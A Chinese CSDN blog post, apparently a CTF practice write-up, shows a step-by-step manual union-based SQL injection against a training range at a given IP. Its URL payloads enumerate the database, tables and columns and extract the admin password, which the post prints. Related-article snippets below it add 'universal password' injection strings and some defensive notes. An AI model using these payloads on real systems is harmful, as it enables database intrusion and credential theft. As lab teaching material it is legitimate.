一次简单的通过sql注入获取目标用户名和密码的流程

最新推荐文章于 2024-08-11 13:28:35 发布
最新推荐文章于 2024-08-11 13:28:35 发布
阅读量1.4k 收藏 12
点赞数 2
分类专栏: CTF-web刷题记录 文章标签: mysql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slismy/article/details/108922998
版权

SQL注入 数据库渗透 靶场环境 信息泄露 安全漏洞
关键词由CSDN通过智能技术生成

靶场环境:封神台

第一步

http://59.63.200.79:8003/?id=2-1
验证注入点存在

第二步

http://59.63.200.79:8003/?id=1 order by 1/2/…
查询到长度为2

第三步

http://59.63.200.79:8003/?id=9.99 union select 1,2
验证数据返回点,返回值为2

第四步

http://59.63.200.79:8003/?id=9.99 union select 1,database()
查询到库名为maoshe

第五步

http://59.63.200.79:8003/?id=9.99 union select 1,table_name from information_schema.tables where table_schema=database()
查询到maoshe库下的表名
admin
dirs
news
xss

第六步

http://59.63.200.79:8003/?id=9.99 union select 1,column_name from information_schema.columns where table_name=‘admin’ and table_schema=database()
查询到admin表下字段名 #group_concat(column_name)
id
username
password

第七步

http://59.63.200.79:8003/?id=9.99 union select 1,password from admin
查询到admin下用户名和密码分别为
admin
hellohack

Bell0ne_
关注
专栏目录
怎样获取用户及用户组信息
lmd1997130的博客
07-21 900
利用 struct passwd这个结构体就可以获取用户的信息 此结构体如下所示: struct passwd   {     char *pw_name;                /* 用户登录名    */     char *pw_passwd;              /* 密码(加密后)*/     __uid_t pw_uid;             
网络安全---SQL注入攻击
zdsxc_的博客
04-05 1281
容器通常是一次性的,因此一旦被销毁,容器内的所有数据都会丢失。对于此次实验,我们确实希望将数据保留在 MySQL 数据库中,确保我们在关闭容器时,我们不会丢失工作。为此,我们将主机上的mysql_data文件夹(在 MySQL 容器运行后,在Labsetup文件夹内创建)装载(mounted)到MySQL容器内的 /var/lib/mysql 文件夹中。mysql_data文件夹是 MySQL 存储其数据库的地方。因此,即使容器被销毁,数据库中的数据仍保留。
SQL注入获取用户名密码练习(integer型注入)
热门推荐
nielilijy的专栏
08-07 1万+
万能密码 ' or 1='1 select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’ select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’ 1=‘1’ 永远为真 这个也是OWASP放出来的一个web安全学习平台,PHP+M...
SQL SERVER 数据库用户名密码扫描小工具
07-20
SQL SERVER 数据库用户名密码扫描小工具
第四章 SQL注入
最新发布
weixin_51186121的博客
08-11 272
SQL注入问题说的是:用户输入的信息中含有SQL语句关键字,和程序中的SQL语句进行字符串拼接,导致程序中的SQL语句改变了原意。原因是:用户提供的信息中有SQL语句关键字,并且和底层的SQL字符串进行了拼接,变成了一个全新的SQL语句。,也就是说:用户提供的信息中即使含有SQL语句的关键字,那么这个信息也只会被当做一个值传递给SQL语句,用户提供的信息不再参与SQL语句的编译了,这样就解决了SQL注入问题。如果以上的SQL语句能够查询到结果,说明用户名密码是正确的,则登录成功。
mysql注入读取数据库密码_防止sql注入方法 如何防止java中将MySQL数据库验证密码加上 ' or '1'= '1 就可以出现万能密码 的PreparedStatement...
weixin_39892800的博客
01-28 156
packagecom.swift;importjava.sql.Connection;importjava.sql.DriverManager;importjava.sql.PreparedStatement;importjava.sql.ResultSet;importjava.sql.SQLException;public classLoginJDBC$PreparedStatement2 {...
注入之mysql数据库(手工注入)
2301_79194110的博客
09-15 378
MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。MySQL 5版本由于information_schema库的存在,注入攻击相对来说方便了许多。
通过SQL注入拿到管理员密码
qq_52337463的博客
01-14 4199
该靶场来自于(封神台封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 首先我们看下题目 题目是通过SQL注入拿到管理员后台密码 我们先点开"传送门"打开靶场 靶场已经打开了,我们先点"点击查看新闻"打开页面 看起来没啥有用的信息但是别慌,我们先进行SQL注入 在URL中***/?id=1 后面写命令进行注入 and 1=2 union select 1,concat(username,',',password) from admin 这里的admin...
SQL注入攻击实验报告
05-07
- **实验目的**:本实验旨在通过搭建一个简单的Web应用程序,模拟SQL注入攻击的过程,并探讨相应的防御措施,帮助理解SQL注入攻击的基本原理及其防范策略。 #### 二、实验原理 - **SQL注入的概念**:SQL注入是一种...
实验三:XSS和SQL注入
yghlqgt的博客
11-27 757
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
1. **绕过原理**:登录绕过通常是指通过构造特殊的请求或者利用软件漏洞来绕过正常的认证流程,从而无需输入正确的用户名密码即可访问系统资源。 2. **实施步骤**: - 分析登录逻辑:首先需要了解目标系统的登录...
sql注入详解
m0_73109590的博客
08-03 1006
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
CTF刷题-SQL注入
weixin_43882862的博客
08-08 3451
靶场第二题,SQL注入 题目 链接:http://59.63.200.79:8004/ 解题思路 打开这个链接,我们可以发现是一个新闻门户网站。 这时候试着点击一下新闻动态里面的一条新闻,因为新闻页面的功能往往和数据库有关系,同时发现点开的新闻界面链接是: http://59.63.200.79:8004/shownews.asp?id=171。本能告诉我,这个可能存在SQL注入漏洞。但是这个题目,使用SQL注入漏洞判别方式(输入单引号)提示有错误。使用order by 10又可以访问,说明数据库有10
使用 Burpsuite 进行POST 方式的SQL注入
枫梓林のBlog
04-25 8364
使用 Burpsuite 进行POST 方式的SQL注入 文章目录使用 Burpsuite 进行POST 方式的SQL注入0x01 Burpsuite介绍1.打开浏览器设置代理2.打开 burp suite0x02 POST 方式注入1.打开 Less-11页面0x03 POST 方式的盲注1.POST 方式的布尔型盲注1.1 Less-152.POST 方式的时间盲注0x04 HTTP 头的注入方式1.HTTP 头注入原理2. HTTP User-Agent 注入Less-183.HTTP Referer
SQL Server密码破解工具简介
01-08 2626
在对SQL Server系统执行入侵测试或者更高级别的安全审计时,有一种测试不应该被忽略,那就是SQL Server密码测试。这一点看起来显而易见,但是很多人都会忽略它。   密码测试可以帮助检查恶意入侵者或者外部攻击者,测试他们要强行进入数据库有多容易,而且还可以确保SQL Server用户对他们的账号负责。此外,测试密码的漏洞在SQL Server混合模式认证的情况下尤其重要,这种模式比其他
sql手工注入练习拿flag
太阳照耀我走四方
02-14 2706
sql手工简单注入拿flag
简单SQL注入---id和万能密码
qq_74414939的博客
05-08 2371
id和万能密码
SQL注入(万能密码)
qq_69432323的博客
03-14 5768
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
​ 一文搞懂什么是SQL注入---SQL注入详解
VN520的博客
09-06 551
通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程:词法和语义解析 优化sql语句,制定执行计划 执行并返回结果 我们把这种普通语句称作Immediate Statements。但是很多情况,我们的一条sql语句可能会反复执行,或者每次执行的时候只有个别的值不同(比如query的where子句值不同,update的set子句值不同,insert的values值不同)。如果每次都需要经过上面的词法语义解析、语句优化、制定执行计划等,则效率就明显不行了。
Web黑客攻击流程与攻击策略
05-29
Web黑客攻击流程通常包括以下几个步骤: 1. 收集信息:黑客通过搜索引擎、目录扫描、端口扫描等方式,收集目标网站的信息,包括IP地址、域名、操作系统、Web应用程序、中间件、数据库等信息。 2. 发现漏洞:黑客使用各种工具和技术,如漏洞扫描、漏洞利用、社会工程学等,发现目标网站中存在的漏洞,如SQL注入、XSS漏洞、文件上传漏洞等。 3. 利用漏洞:黑客通过利用已经发现的漏洞,获取目标网站的敏感信息,包括用户名密码、个人信息、公司机密等。 4. 掩盖攻击痕迹:黑客为了掩盖攻击痕迹,会删除日志记录、覆盖攻击轨迹、伪造攻击来源等。 攻击策略主要有以下几种: 1. SQL注入攻击:黑客通过构造恶意的SQL语句,利用Web应用程序中的漏洞,获取数据库中的敏感信息。 2. XSS攻击:黑客通过在Web页面中插入恶意脚本,窃取用户的Cookie信息,盗取用户的账号和密码等敏感信息。 3. CSRF攻击:黑客通过伪造请求,欺骗用户在不知情的情况下执行某些操作,如修改密码、转账等。 4. 文件上传漏洞攻击:黑客通过上传恶意文件,执行后门程序,获取系统权限,进而控制整个网站。 5. 远程代码执行攻击:黑客通过构造恶意代码,利用Web应用程序中的漏洞,远程执行恶意代码,获取系统权限,窃取敏感信息。 为了有效防御Web黑客攻击,我们需要不断学习和掌握最新的安全技术和工具,同时加强Web应用程序中的安全防御措施,如输入验证、输出编码、访问控制等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值